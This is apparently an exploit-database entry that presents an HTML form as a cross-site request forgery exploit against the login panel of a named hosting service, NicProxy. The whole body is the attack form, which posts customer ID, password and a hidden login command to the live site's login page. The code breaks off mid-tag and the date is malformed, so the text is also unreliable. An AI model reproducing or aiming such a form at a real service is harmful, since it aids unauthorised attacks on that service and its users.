# Exploit Title: NicProxy Hosting Service - CSRF
# Date: 2021-29-10
# Exploit Author: Xale
# Tested on: Windows 10
Site ; https://www.nicproxy.com/
CSRF Exploit ;
<html>
<body>
<form action="https://www.nicproxy.com/panel/login.asp" method="post">
<div class="error-msg">
</div>
<div class="form-row">
<label>Bayi Kodu</label>
<input type="text" name="CustomerID" class="textbox" />
</div>
<div class="form-row">
<label>Şifre</label>
<input type="password" name="password" class="textbox" />
</div>
<div class="form-row">
<input type="submit" value="Giriş" class="submit" />
</div>
<input type="hidden" name="command" value="login" />
<input typ
</body>
</html>